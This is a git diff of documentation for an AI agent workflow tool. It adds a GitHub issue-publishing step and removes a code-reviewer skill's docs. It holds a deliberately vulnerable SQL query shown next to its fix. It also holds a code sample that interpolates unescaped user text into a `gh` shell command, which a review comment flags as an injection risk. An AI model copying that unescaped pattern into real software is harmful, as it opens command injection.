        { label: "Run Deeper", description: "Continue with more iterations" },
        { label: "Skip", description: "Complete without exporting" }
      ]
    }
  ]
});
|
||||
```
|
||||
|
||||
## Output File Structure
|
||||
|
||||
```
|
||||
.workflow/issues/discoveries/
|
||||
└── {DBP-YYYYMMDD-HHmmss}/
|
||||
├── discovery-state.json # Session state with iteration tracking
|
||||
├── iterations/
|
||||
│ ├── 1/
|
||||
│ │ └── {dimension}.json # Dimension findings
|
||||
│ ├── 2/
|
||||
│ │ └── {dimension}.json
|
||||
│ └── ...
|
||||
├── comparison-analysis.json # Cross-dimension comparison (if applicable)
|
||||
└── discovery-issues.jsonl # Generated issue candidates
|
||||
```
|
||||
|
||||
**Simplified Design**:
|
||||
- ACE context and Gemini plan kept in memory, not persisted
|
||||
- Iteration summaries embedded in state
|
||||
- No separate summary.md (state.json contains all needed info)
|
||||
|
||||
## Schema References
|
||||
|
||||
| Schema | Path | Used By |
|
||||
|--------|------|---------|
|
||||
| **Discovery State** | `discovery-state-schema.json` | Orchestrator (state tracking) |
|
||||
| **Discovery Finding** | `discovery-finding-schema.json` | Dimension agents (output) |
|
||||
| **Exploration Plan** | `exploration-plan-schema.json` | Gemini output validation (memory only) |
|
||||
|
||||
## Configuration Options
|
||||
|
||||
| Flag | Default | Description |
|
||||
|------|---------|-------------|
|
||||
| `--scope` | `**/*` | File pattern to explore |
|
||||
| `--depth` | `standard` | `standard` (3 iterations) or `deep` (5+ iterations) |
|
||||
| `--max-iterations` | 5 | Maximum exploration iterations |
|
||||
| `--tool` | `gemini` | Planning tool (gemini/qwen) |
|
||||
| `--plan-only` | `false` | Stop after Phase 2 (Gemini planning), show plan for user review |
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Single Module Deep Dive
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Find all potential issues in the auth module" --scope=src/auth/**
|
||||
```
|
||||
|
||||
**Gemini plans** (single dimension):
|
||||
- Dimension: auth-module
|
||||
- Focus: security vulnerabilities, edge cases, error handling, test gaps
|
||||
|
||||
**Iterations**: 2-3 (until no new findings)
|
||||
|
||||
### Example 2: API Contract Comparison
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Check if API calls match implementations" --scope=src/**
|
||||
```
|
||||
|
||||
**Gemini plans** (comparison):
|
||||
- Dimension 1: api-consumers (fetch calls, hooks, services)
|
||||
- Dimension 2: api-providers (handlers, routes, controllers)
|
||||
- Comparison matrix: endpoints, methods, payloads, responses
|
||||
|
||||
### Example 3: Multi-Module Audit
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Audit the payment flow for issues" --scope=src/payment/**
|
||||
```
|
||||
|
||||
**Gemini plans** (multi-dimension):
|
||||
- Dimension 1: payment-logic (calculations, state transitions)
|
||||
- Dimension 2: validation (input checks, business rules)
|
||||
- Dimension 3: error-handling (failure modes, recovery)
|
||||
|
||||
### Example 4: Plan Only Mode
|
||||
|
||||
```bash
|
||||
/issue:discover-by-prompt "Find inconsistent patterns" --plan-only
|
||||
```
|
||||
|
||||
Stops after Gemini planning, outputs:
|
||||
```
|
||||
Gemini Plan:
|
||||
- Intent: search
|
||||
- Dimensions: 2 (pattern-definitions, pattern-usages)
|
||||
- Estimated iterations: 3
|
||||
|
||||
Continue with exploration? [Y/n]
|
||||
```
|
||||
|
||||
## Related Commands
|
||||
|
||||
```bash
|
||||
# After discovery, plan solutions
|
||||
/issue:plan DBP-001-01,DBP-001-02
|
||||
|
||||
# View all discoveries
|
||||
/issue:manage
|
||||
|
||||
# Standard perspective-based discovery
|
||||
/issue:discover src/auth/** --perspectives=security,bug
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Be Specific in Prompts**: More specific prompts lead to better Gemini planning
|
||||
2. **Scope Appropriately**: Narrow scope for focused comparison, wider for audits
|
||||
3. **Review Exploration Plan**: Use `--plan-only` to inspect the Gemini plan before long explorations (the plan is kept in memory, not persisted to disk)
|
||||
4. **Use Standard Depth First**: Start with standard, go deep only if needed
|
||||
5. **Combine with `/issue:discover`**: Use prompt-based for comparisons, perspective-based for audits
|
||||
@@ -29,6 +29,10 @@ interface Issue {
|
||||
source_url?: string;
|
||||
labels?: string[];
|
||||
|
||||
// GitHub binding (for non-GitHub sources that publish to GitHub)
|
||||
github_url?: string; // https://github.com/owner/repo/issues/123
|
||||
github_number?: number; // 123
|
||||
|
||||
// Optional structured fields
|
||||
expected_behavior?: string;
|
||||
actual_behavior?: string;
|
||||
@@ -165,7 +169,30 @@ if (clarityScore < 2 && (!issueData.context || issueData.context.length < 20)) {
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 5: Create Issue
|
||||
### Phase 5: GitHub Publishing Decision (Non-GitHub Sources)
|
||||
|
||||
```javascript
|
||||
// For non-GitHub sources, ask whether the user wants to publish to GitHub.
// Issues that already came from GitHub are skipped (they exist there by definition).
let publishToGitHub = false;

if (issueData.source !== 'github') {
  // AskUserQuestion is awaited elsewhere in this workflow (see Phase 5 of the
  // discovery flow); without `await`, `.answers` would be read off the bare
  // Promise and always be undefined.
  const publishAnswer = await AskUserQuestion({
    questions: [{
      question: 'Would you like to publish this issue to GitHub?',
      header: 'Publish',
      multiSelect: false,
      options: [
        { label: 'Yes, publish to GitHub', description: 'Create issue on GitHub and link it' },
        { label: 'No, keep local only', description: 'Store as local issue without GitHub sync' }
      ]
    }]
  });

  // Answers are keyed by the question header; any "Yes…" selection opts in.
  // `?? false` keeps the flag a strict boolean when no answer is present.
  publishToGitHub = publishAnswer.answers?.['Publish']?.includes('Yes') ?? false;
}
|
||||
```
|
||||
|
||||
### Phase 6: Create Issue
|
||||
|
||||
**Summary Display:**
|
||||
- Show ID, title, source, affected files (if any)
|
||||
@@ -220,8 +247,64 @@ EOF
|
||||
}
|
||||
```
|
||||
|
||||
**GitHub Publishing** (if user opted in):
|
||||
```javascript
|
||||
// Step 1: Create local issue FIRST so a local record exists even if the
// GitHub publish step fails afterwards.
const localIssue = createLocalIssue(issueData); // ccw issue create

// Step 2: Publish to GitHub if the user opted in
if (publishToGitHub) {
  // NOTE(review): title/context are interpolated into a shell command without
  // escaping — quotes in user input would break or inject the command.
  // Confirm upstream sanitization or switch to gh's --body-file / stdin.
  const ghResult = Bash(`gh issue create --title "${issueData.title}" --body "${issueData.context}"`);

  // Parse the created issue URL from the gh CLI output.
  const ghUrl = ghResult.match(/https:\/\/github\.com\/[\w-]+\/[\w-]+\/issues\/\d+/)?.[0];
  // Always pass a radix. When no URL matched, parseInt yields NaN and the
  // guard below skips the binding step.
  const ghNumber = Number.parseInt(ghUrl?.match(/\/issues\/(\d+)/)?.[1], 10);

  if (ghNumber) {
    // Step 3: Bind the GitHub issue to the local record
    Bash(`ccw issue update ${localIssue.id} --github-url "${ghUrl}" --github-number ${ghNumber}`);
    // Or via pipe:
    // echo '{"github_url":"${ghUrl}","github_number":${ghNumber}}' | ccw issue update ${localIssue.id}
  }
}
|
||||
```
|
||||
|
||||
**Workflow:**
|
||||
```
|
||||
1. Create local issue (ISS-YYYYMMDD-NNN) → stored in .workflow/issues.jsonl
|
||||
2. If publishToGitHub:
|
||||
a. gh issue create → returns GitHub URL
|
||||
b. Update local issue with github_url + github_number binding
|
||||
3. Both local and GitHub issues exist, linked together
|
||||
```
|
||||
|
||||
**Example with GitHub Publishing:**
|
||||
```bash
|
||||
# User creates text issue
|
||||
/issue:new "Login fails with special chars. Expected: success. Actual: 500"
|
||||
|
||||
# System asks: "Would you like to publish this issue to GitHub?"
|
||||
# User selects: "Yes, publish to GitHub"
|
||||
|
||||
# Output:
|
||||
# ✓ Local issue created: ISS-20251229-001
|
||||
# ✓ Published to GitHub: https://github.com/org/repo/issues/123
|
||||
# ✓ GitHub binding saved to local issue
|
||||
# → Next step: /issue:plan ISS-20251229-001
|
||||
|
||||
# Resulting issue JSON:
|
||||
{
|
||||
"id": "ISS-20251229-001",
|
||||
"title": "Login fails with special chars",
|
||||
"source": "text",
|
||||
"github_url": "https://github.com/org/repo/issues/123",
|
||||
"github_number": 123,
|
||||
...
|
||||
}
|
||||
```
|
||||
|
||||
**Completion:**
|
||||
- Display created issue ID
|
||||
- Show GitHub URL (if published)
|
||||
- Show next step: `/issue:plan <id>`
|
||||
|
||||
## Execution Flow
|
||||
@@ -240,9 +323,16 @@ Phase 2: Data Extraction (branched by clarity)
|
||||
│ │ (3 files max) │ → feedback │
|
||||
└────────────┴─────────────────┴──────────────┘
|
||||
|
||||
Phase 3: Create Issue
|
||||
Phase 3: GitHub Publishing Decision (non-GitHub only)
|
||||
├─ Source = github: Skip (already from GitHub)
|
||||
└─ Source ≠ github: AskUserQuestion
|
||||
├─ Yes → publishToGitHub = true
|
||||
└─ No → publishToGitHub = false
|
||||
|
||||
Phase 4: Create Issue
|
||||
├─ Score ≥ 2: Direct creation
|
||||
└─ Score < 2: Confirm first → Create
|
||||
└─ If publishToGitHub: gh issue create → link URL
|
||||
|
||||
Note: Deep exploration & lifecycle deferred to /issue:plan
|
||||
```
|
||||
|
||||
@@ -198,11 +198,12 @@ ${issueList}
|
||||
2. Load project context files
|
||||
3. Explore codebase (ACE semantic search)
|
||||
4. Plan solution with tasks (schema: solution-schema.json)
|
||||
5. Write solution to: .workflow/issues/solutions/{issue-id}.jsonl
|
||||
6. Single solution → auto-bind; Multiple → return for selection
|
||||
5. **If github_url exists**: Add final task to comment on GitHub issue
|
||||
6. Write solution to: .workflow/issues/solutions/{issue-id}.jsonl
|
||||
7. Single solution → auto-bind; Multiple → return for selection
|
||||
|
||||
### Rules
|
||||
- Solution ID format: SOL-{issue-id}-{seq}
|
||||
- Solution ID format: SOL-{issue-id}-{uid} (uid: 4 random alphanumeric chars, e.g., a7x9)
|
||||
- Single solution per issue → auto-bind via ccw issue bind
|
||||
- Multiple solutions → register only, return pending_selection
|
||||
- Tasks must have quantified acceptance.criteria
|
||||
|
||||
@@ -1,340 +0,0 @@
|
||||
# Code Reviewer Skill
|
||||
|
||||
A comprehensive code review skill for identifying security vulnerabilities and best practices violations.
|
||||
|
||||
## Overview
|
||||
|
||||
The **code-reviewer** skill provides automated code review capabilities covering:
|
||||
- **Security Analysis**: OWASP Top 10, CWE Top 25, language-specific vulnerabilities
|
||||
- **Code Quality**: Naming conventions, complexity, duplication, dead code
|
||||
- **Performance**: N+1 queries, inefficient algorithms, memory leaks
|
||||
- **Maintainability**: Documentation, test coverage, dependency health
|
||||
|
||||
## Quick Start
|
||||
|
||||
### Basic Usage
|
||||
|
||||
```bash
|
||||
# Review entire codebase
|
||||
/code-reviewer
|
||||
|
||||
# Review specific directory
|
||||
/code-reviewer --scope src/auth
|
||||
|
||||
# Focus on security only
|
||||
/code-reviewer --focus security
|
||||
|
||||
# Focus on best practices only
|
||||
/code-reviewer --focus best-practices
|
||||
```
|
||||
|
||||
### Advanced Options
|
||||
|
||||
```bash
|
||||
# Review with custom severity threshold
|
||||
/code-reviewer --severity critical,high
|
||||
|
||||
# Review specific file types
|
||||
/code-reviewer --languages typescript,python
|
||||
|
||||
# Generate detailed report
|
||||
/code-reviewer --report-level detailed
|
||||
|
||||
# Resume from previous session
|
||||
/code-reviewer --resume
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
### Security Analysis
|
||||
|
||||
✅ **OWASP Top 10 2021 Coverage**
|
||||
- Injection vulnerabilities (SQL, Command, XSS)
|
||||
- Authentication & authorization flaws
|
||||
- Sensitive data exposure
|
||||
- Security misconfiguration
|
||||
- And more...
|
||||
|
||||
✅ **CWE Top 25 Coverage**
|
||||
- Cross-site scripting (CWE-79)
|
||||
- SQL injection (CWE-89)
|
||||
- Command injection (CWE-78)
|
||||
- Input validation (CWE-20)
|
||||
- And more...
|
||||
|
||||
✅ **Language-Specific Checks**
|
||||
- JavaScript/TypeScript: prototype pollution, eval usage
|
||||
- Python: pickle vulnerabilities, command injection
|
||||
- Java: deserialization, XXE
|
||||
- Go: race conditions, memory leaks
|
||||
|
||||
### Best Practices Review
|
||||
|
||||
✅ **Code Quality**
|
||||
- Naming convention compliance
|
||||
- Cyclomatic complexity analysis
|
||||
- Code duplication detection
|
||||
- Dead code identification
|
||||
|
||||
✅ **Performance**
|
||||
- N+1 query detection
|
||||
- Inefficient algorithm patterns
|
||||
- Memory leak detection
|
||||
- Resource cleanup verification
|
||||
|
||||
✅ **Maintainability**
|
||||
- Documentation coverage
|
||||
- Test coverage analysis
|
||||
- Dependency health check
|
||||
- Error handling review
|
||||
|
||||
## Output
|
||||
|
||||
The skill generates comprehensive reports in `.code-review/` directory:
|
||||
|
||||
```
|
||||
.code-review/
|
||||
├── inventory.json # File inventory with metadata
|
||||
├── security-findings.json # Security vulnerabilities
|
||||
├── best-practices-findings.json # Best practices violations
|
||||
├── summary.json # Summary statistics
|
||||
├── REPORT.md # Comprehensive markdown report
|
||||
└── FIX-CHECKLIST.md # Actionable fix checklist
|
||||
```
|
||||
|
||||
### Report Contents
|
||||
|
||||
**REPORT.md** includes:
|
||||
- Executive summary with risk assessment
|
||||
- Quality scores (Security, Code Quality, Performance, Maintainability)
|
||||
- Detailed findings organized by severity
|
||||
- Code examples with fix recommendations
|
||||
- Action plan prioritized by urgency
|
||||
- Compliance status (PCI DSS, HIPAA, GDPR, SOC 2)
|
||||
|
||||
**FIX-CHECKLIST.md** provides:
|
||||
- Checklist format for tracking fixes
|
||||
- Organized by severity (Critical → Low)
|
||||
- Effort estimates for each issue
|
||||
- Priority assignments
|
||||
|
||||
## Configuration
|
||||
|
||||
Create `.code-reviewer.json` in project root:
|
||||
|
||||
```json
|
||||
{
|
||||
"scope": {
|
||||
"include": ["src/**/*", "lib/**/*"],
|
||||
"exclude": ["**/*.test.ts", "**/*.spec.ts", "**/node_modules/**"]
|
||||
},
|
||||
"security": {
|
||||
"enabled": true,
|
||||
"checks": ["owasp-top-10", "cwe-top-25"],
|
||||
"severity_threshold": "medium"
|
||||
},
|
||||
"best_practices": {
|
||||
"enabled": true,
|
||||
"code_quality": true,
|
||||
"performance": true,
|
||||
"maintainability": true
|
||||
},
|
||||
"reporting": {
|
||||
"format": "markdown",
|
||||
"output_path": ".code-review/",
|
||||
"include_snippets": true,
|
||||
"include_fixes": true
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Workflow
|
||||
|
||||
### Phase 1: Code Discovery
|
||||
- Discover and categorize code files
|
||||
- Extract metadata (LOC, complexity, framework)
|
||||
- Prioritize files (Critical, High, Medium, Low)
|
||||
|
||||
### Phase 2: Security Analysis
|
||||
- Scan for OWASP Top 10 vulnerabilities
|
||||
- Check CWE Top 25 weaknesses
|
||||
- Apply language-specific security patterns
|
||||
- Generate security findings
|
||||
|
||||
### Phase 3: Best Practices Review
|
||||
- Analyze code quality issues
|
||||
- Detect performance problems
|
||||
- Assess maintainability concerns
|
||||
- Generate best practices findings
|
||||
|
||||
### Phase 4: Report Generation
|
||||
- Consolidate all findings
|
||||
- Calculate quality scores
|
||||
- Generate comprehensive reports
|
||||
- Create actionable checklists
|
||||
|
||||
## Integration
|
||||
|
||||
### Pre-commit Hook
|
||||
|
||||
Block commits with critical/high issues:
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
# .git/hooks/pre-commit
|
||||
|
||||
staged_files=$(git diff --cached --name-only --diff-filter=ACMR)
|
||||
ccw run code-reviewer --scope "$staged_files" --severity critical,high
|
||||
|
||||
if [ $? -ne 0 ]; then
|
||||
echo "❌ Code review found critical/high issues. Commit aborted."
|
||||
exit 1
|
||||
fi
|
||||
```
|
||||
|
||||
### CI/CD Integration
|
||||
|
||||
```yaml
|
||||
# .github/workflows/code-review.yml
|
||||
name: Code Review
|
||||
on: [pull_request]
|
||||
|
||||
jobs:
|
||||
review:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run Code Review
|
||||
run: |
|
||||
ccw run code-reviewer --report-level detailed
|
||||
ccw report upload .code-review/report.md
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Security-Focused Review
|
||||
|
||||
```bash
|
||||
# Review authentication module for security issues
|
||||
/code-reviewer --scope src/auth --focus security --severity critical,high
|
||||
```
|
||||
|
||||
**Output**: Security findings with OWASP/CWE mappings and fix recommendations
|
||||
|
||||
### Example 2: Performance Review
|
||||
|
||||
```bash
|
||||
# Review API endpoints for performance issues
|
||||
/code-reviewer --scope src/api --focus best-practices --check performance
|
||||
```
|
||||
|
||||
**Output**: N+1 queries, inefficient algorithms, memory leak detections
|
||||
|
||||
### Example 3: Full Project Audit
|
||||
|
||||
```bash
|
||||
# Comprehensive review of entire codebase
|
||||
/code-reviewer --report-level detailed --output .code-review/audit-2024-01.md
|
||||
```
|
||||
|
||||
**Output**: Complete audit with all findings, scores, and action plan
|
||||
|
||||
## Compliance Support
|
||||
|
||||
The skill maps findings to compliance requirements:
|
||||
|
||||
- **PCI DSS**: Requirement 6.5 (Common coding vulnerabilities)
|
||||
- **HIPAA**: Technical safeguards and access controls
|
||||
- **GDPR**: Article 32 (Security of processing)
|
||||
- **SOC 2**: Security controls and monitoring
|
||||
|
||||
## Architecture
|
||||
|
||||
### Execution Mode
|
||||
**Sequential** - Fixed phase order for systematic review:
|
||||
1. Code Discovery → 2. Security Analysis → 3. Best Practices → 4. Report Generation
|
||||
|
||||
### Tools Used
|
||||
- `mcp__ace-tool__search_context` - Semantic code search
|
||||
- `mcp__ccw-tools__smart_search` - Pattern matching
|
||||
- `Read` - File content access
|
||||
- `Write` - Report generation
|
||||
|
||||
## Quality Standards
|
||||
|
||||
### Scoring System
|
||||
|
||||
```
|
||||
Overall Score = (
|
||||
Security Score × 0.4 +
|
||||
Code Quality Score × 0.25 +
|
||||
Performance Score × 0.2 +
|
||||
Maintainability Score × 0.15
|
||||
)
|
||||
```
|
||||
|
||||
### Score Ranges
|
||||
- **A (90-100)**: Excellent - Production ready
|
||||
- **B (80-89)**: Good - Minor improvements needed
|
||||
- **C (70-79)**: Acceptable - Some issues to address
|
||||
- **D (60-69)**: Poor - Significant improvements required
|
||||
- **F (0-59)**: Failing - Major issues, not production ready
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Large Codebase
|
||||
|
||||
If review takes too long:
|
||||
```bash
|
||||
# Review in batches
|
||||
/code-reviewer --scope src/module-1
|
||||
/code-reviewer --scope src/module-2 --resume
|
||||
|
||||
# Or use parallel execution
|
||||
/code-reviewer --parallel 4
|
||||
```
|
||||
|
||||
### False Positives
|
||||
|
||||
Configure suppressions in `.code-reviewer.json`:
|
||||
```json
|
||||
{
|
||||
"suppressions": {
|
||||
"security": {
|
||||
"sql-injection": {
|
||||
"paths": ["src/legacy/**/*"],
|
||||
"reason": "Legacy code, scheduled for refactor"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## File Structure
|
||||
|
||||
```
|
||||
.claude/skills/code-reviewer/
|
||||
├── SKILL.md # Main skill documentation
|
||||
├── README.md # This file
|
||||
├── phases/
|
||||
│ ├── 01-code-discovery.md
|
||||
│ ├── 02-security-analysis.md
|
||||
│ ├── 03-best-practices-review.md
|
||||
│ └── 04-report-generation.md
|
||||
├── specs/
|
||||
│ ├── security-requirements.md
|
||||
│ ├── best-practices-requirements.md
|
||||
│ └── quality-standards.md
|
||||
└── templates/
|
||||
├── security-finding.md
|
||||
├── best-practice-finding.md
|
||||
└── report-template.md
|
||||
```
|
||||
|
||||
## Version
|
||||
|
||||
**v1.0.0** - Initial release
|
||||
|
||||
## License
|
||||
|
||||
MIT License
|
||||
@@ -1,308 +0,0 @@
|
||||
---
|
||||
name: code-reviewer
|
||||
description: Comprehensive code review skill for identifying security vulnerabilities and best practices violations. Triggers on "code review", "review code", "security audit", "代码审查".
|
||||
allowed-tools: Read, Glob, Grep, mcp__ace-tool__search_context, mcp__ccw-tools__smart_search
|
||||
---
|
||||
|
||||
# Code Reviewer
|
||||
|
||||
Comprehensive code review skill for identifying security vulnerabilities and best practices violations.
|
||||
|
||||
## Architecture Overview
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Code Reviewer Workflow │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ │
|
||||
│ Phase 1: Code Discovery → 发现待审查的代码文件 │
|
||||
│ & Scoping - 根据语言/框架识别文件 │
|
||||
│ ↓ - 设置审查范围和优先级 │
|
||||
│ │
|
||||
│ Phase 2: Security → 安全漏洞扫描 │
|
||||
│ Analysis - OWASP Top 10 检查 │
|
||||
│ ↓ - 常见漏洞模式识别 │
|
||||
│ - 敏感数据泄露检查 │
|
||||
│ │
|
||||
│ Phase 3: Best Practices → 最佳实践审查 │
|
||||
│ Review - 代码质量检查 │
|
||||
│ ↓ - 性能优化建议 │
|
||||
│ - 可维护性评估 │
|
||||
│ │
|
||||
│ Phase 4: Report → 生成审查报告 │
|
||||
│ Generation - 按严重程度分类问题 │
|
||||
│ - 提供修复建议和示例 │
|
||||
│ - 生成可追踪的修复清单 │
|
||||
│ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
### Security Analysis
|
||||
|
||||
- **OWASP Top 10 Coverage**
|
||||
- Injection vulnerabilities (SQL, Command, LDAP)
|
||||
- Authentication & authorization bypass
|
||||
- Sensitive data exposure
|
||||
- XML External Entities (XXE)
|
||||
- Broken access control
|
||||
- Security misconfiguration
|
||||
- Cross-Site Scripting (XSS)
|
||||
- Insecure deserialization
|
||||
- Components with known vulnerabilities
|
||||
- Insufficient logging & monitoring
|
||||
|
||||
- **Language-Specific Checks**
|
||||
- JavaScript/TypeScript: prototype pollution, eval usage
|
||||
- Python: pickle vulnerabilities, command injection
|
||||
- Java: deserialization, path traversal
|
||||
- Go: race conditions, memory leaks
|
||||
|
||||
### Best Practices Review
|
||||
|
||||
- **Code Quality**
|
||||
- Naming conventions
|
||||
- Function complexity (cyclomatic complexity)
|
||||
- Code duplication
|
||||
- Dead code detection
|
||||
|
||||
- **Performance**
|
||||
- N+1 queries
|
||||
- Inefficient algorithms
|
||||
- Memory leaks
|
||||
- Resource cleanup
|
||||
|
||||
- **Maintainability**
|
||||
- Documentation quality
|
||||
- Test coverage
|
||||
- Error handling patterns
|
||||
- Dependency management
|
||||
|
||||
## Usage
|
||||
|
||||
### Basic Review
|
||||
|
||||
```bash
|
||||
# Review entire codebase
|
||||
/code-reviewer
|
||||
|
||||
# Review specific directory
|
||||
/code-reviewer --scope src/auth
|
||||
|
||||
# Focus on security only
|
||||
/code-reviewer --focus security
|
||||
|
||||
# Focus on best practices only
|
||||
/code-reviewer --focus best-practices
|
||||
```
|
||||
|
||||
### Advanced Options
|
||||
|
||||
```bash
|
||||
# Review with custom severity threshold
|
||||
/code-reviewer --severity critical,high
|
||||
|
||||
# Review specific file types
|
||||
/code-reviewer --languages typescript,python
|
||||
|
||||
# Generate detailed report with code snippets
|
||||
/code-reviewer --report-level detailed
|
||||
|
||||
# Resume from previous session
|
||||
/code-reviewer --resume
|
||||
```
|
||||
|
||||
## Configuration
|
||||
|
||||
Create `.code-reviewer.json` in project root:
|
||||
|
||||
```json
|
||||
{
|
||||
"scope": {
|
||||
"include": ["src/**/*", "lib/**/*"],
|
||||
"exclude": ["**/*.test.ts", "**/*.spec.ts", "**/node_modules/**"]
|
||||
},
|
||||
"security": {
|
||||
"enabled": true,
|
||||
"checks": ["owasp-top-10", "cwe-top-25"],
|
||||
"severity_threshold": "medium"
|
||||
},
|
||||
"best_practices": {
|
||||
"enabled": true,
|
||||
"code_quality": true,
|
||||
"performance": true,
|
||||
"maintainability": true
|
||||
},
|
||||
"reporting": {
|
||||
"format": "markdown",
|
||||
"output_path": ".code-review/",
|
||||
"include_snippets": true,
|
||||
"include_fixes": true
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### Review Report Structure
|
||||
|
||||
```markdown
|
||||
# Code Review Report
|
||||
|
||||
## Executive Summary
|
||||
- Total Issues: 42
|
||||
- Critical: 3
|
||||
- High: 8
|
||||
- Medium: 15
|
||||
- Low: 16
|
||||
|
||||
## Security Findings
|
||||
|
||||
### [CRITICAL] SQL Injection in User Query
|
||||
**File**: src/auth/user-service.ts:145
|
||||
**Issue**: Unsanitized user input in SQL query
|
||||
**Fix**: Use parameterized queries
|
||||
|
||||
Code Snippet:
|
||||
\`\`\`typescript
|
||||
// ❌ Vulnerable
|
||||
const query = `SELECT * FROM users WHERE username = '${username}'`;
|
||||
|
||||
// ✅ Fixed
|
||||
const query = 'SELECT * FROM users WHERE username = ?';
|
||||
db.execute(query, [username]);
|
||||
\`\`\`
|
||||
|
||||
## Best Practices Findings
|
||||
|
||||
### [MEDIUM] High Cyclomatic Complexity
|
||||
**File**: src/utils/validator.ts:78
|
||||
**Issue**: Function has complexity score of 15 (threshold: 10)
|
||||
**Fix**: Break into smaller functions
|
||||
|
||||
...
|
||||
```
|
||||
|
||||
## Phase Documentation
|
||||
|
||||
| Phase | Description | Output |
|
||||
|-------|-------------|--------|
|
||||
| [01-code-discovery.md](phases/01-code-discovery.md) | Discover and categorize code files | File inventory with metadata |
|
||||
| [02-security-analysis.md](phases/02-security-analysis.md) | Analyze security vulnerabilities | Security findings list |
|
||||
| [03-best-practices-review.md](phases/03-best-practices-review.md) | Review code quality and practices | Best practices findings |
|
||||
| [04-report-generation.md](phases/04-report-generation.md) | Generate comprehensive report | Markdown report |
|
||||
|
||||
## Specifications
|
||||
|
||||
- [specs/security-requirements.md](specs/security-requirements.md) - Security check specifications
|
||||
- [specs/best-practices-requirements.md](specs/best-practices-requirements.md) - Best practices standards
|
||||
- [specs/quality-standards.md](specs/quality-standards.md) - Overall quality standards
|
||||
- [specs/severity-classification.md](specs/severity-classification.md) - Issue severity criteria
|
||||
|
||||
## Templates
|
||||
|
||||
- [templates/security-finding.md](templates/security-finding.md) - Security finding template
|
||||
- [templates/best-practice-finding.md](templates/best-practice-finding.md) - Best practice finding template
|
||||
- [templates/report-template.md](templates/report-template.md) - Final report template
|
||||
|
||||
## Integration with Development Workflow
|
||||
|
||||
### Pre-commit Hook
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
# .git/hooks/pre-commit
|
||||
|
||||
# Run code review on staged files
|
||||
staged_files=$(git diff --cached --name-only --diff-filter=ACMR)
|
||||
ccw run code-reviewer --scope "$staged_files" --severity critical,high
|
||||
|
||||
if [ $? -ne 0 ]; then
|
||||
echo "❌ Code review found critical/high issues. Commit aborted."
|
||||
exit 1
|
||||
fi
|
||||
```
|
||||
|
||||
### CI/CD Integration
|
||||
|
||||
```yaml
|
||||
# .github/workflows/code-review.yml
|
||||
name: Code Review
|
||||
on: [pull_request]
|
||||
|
||||
jobs:
|
||||
review:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run Code Review
|
||||
run: |
|
||||
ccw run code-reviewer --report-level detailed
|
||||
ccw report upload .code-review/report.md
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Security-Focused Review
|
||||
|
||||
```bash
|
||||
# Review authentication module for security issues
|
||||
/code-reviewer --scope src/auth --focus security --severity critical,high
|
||||
```
|
||||
|
||||
### Example 2: Performance Review
|
||||
|
||||
```bash
|
||||
# Review API endpoints for performance issues
|
||||
/code-reviewer --scope src/api --focus best-practices --check performance
|
||||
```
|
||||
|
||||
### Example 3: Full Project Audit
|
||||
|
||||
```bash
|
||||
# Comprehensive review of entire codebase
|
||||
/code-reviewer --report-level detailed --output .code-review/audit-2024-01.md
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Large Codebase
|
||||
|
||||
If review takes too long:
|
||||
```bash
|
||||
# Review in batches
|
||||
/code-reviewer --scope src/module-1
|
||||
/code-reviewer --scope src/module-2 --resume
|
||||
|
||||
# Or use parallel execution
|
||||
/code-reviewer --parallel 4
|
||||
```
|
||||
|
||||
### False Positives
|
||||
|
||||
Configure suppressions in `.code-reviewer.json`:
|
||||
```json
|
||||
{
|
||||
"suppressions": {
|
||||
"security": {
|
||||
"sql-injection": {
|
||||
"paths": ["src/legacy/**/*"],
|
||||
"reason": "Legacy code, scheduled for refactor"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Roadmap
|
||||
|
||||
- [ ] AI-powered vulnerability detection
|
||||
- [ ] Integration with popular security scanners (Snyk, SonarQube)
|
||||
- [ ] Automated fix suggestions with diffs
|
||||
- [ ] IDE plugins for real-time feedback
|
||||
- [ ] Custom rule engine for organization-specific policies
|
||||
|
||||
## License
|
||||
|
||||
MIT License - See LICENSE file for details
|
||||
@@ -1,246 +0,0 @@
|
||||
# Phase 1: Code Discovery & Scoping
|
||||
|
||||
## Objective
|
||||
|
||||
Discover and categorize all code files within the specified scope, preparing them for security analysis and best practices review.
|
||||
|
||||
## Input
|
||||
|
||||
- **User Arguments**:
|
||||
- `--scope`: Directory or file patterns (default: entire project)
|
||||
- `--languages`: Specific languages to review (e.g., typescript, python, java)
|
||||
- `--exclude`: Patterns to exclude (e.g., test files, node_modules)
|
||||
|
||||
- **Configuration**: `.code-reviewer.json` (if exists)
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Load Configuration
|
||||
|
||||
```javascript
|
||||
// Check for project-level configuration
|
||||
const configPath = path.join(projectRoot, '.code-reviewer.json');
|
||||
const config = fileExists(configPath)
|
||||
? JSON.parse(readFile(configPath))
|
||||
: getDefaultConfig();
|
||||
|
||||
// Merge user arguments with config
|
||||
const scope = args.scope || config.scope.include;
|
||||
const exclude = args.exclude || config.scope.exclude;
|
||||
const languages = args.languages || config.languages || 'auto';
|
||||
```
|
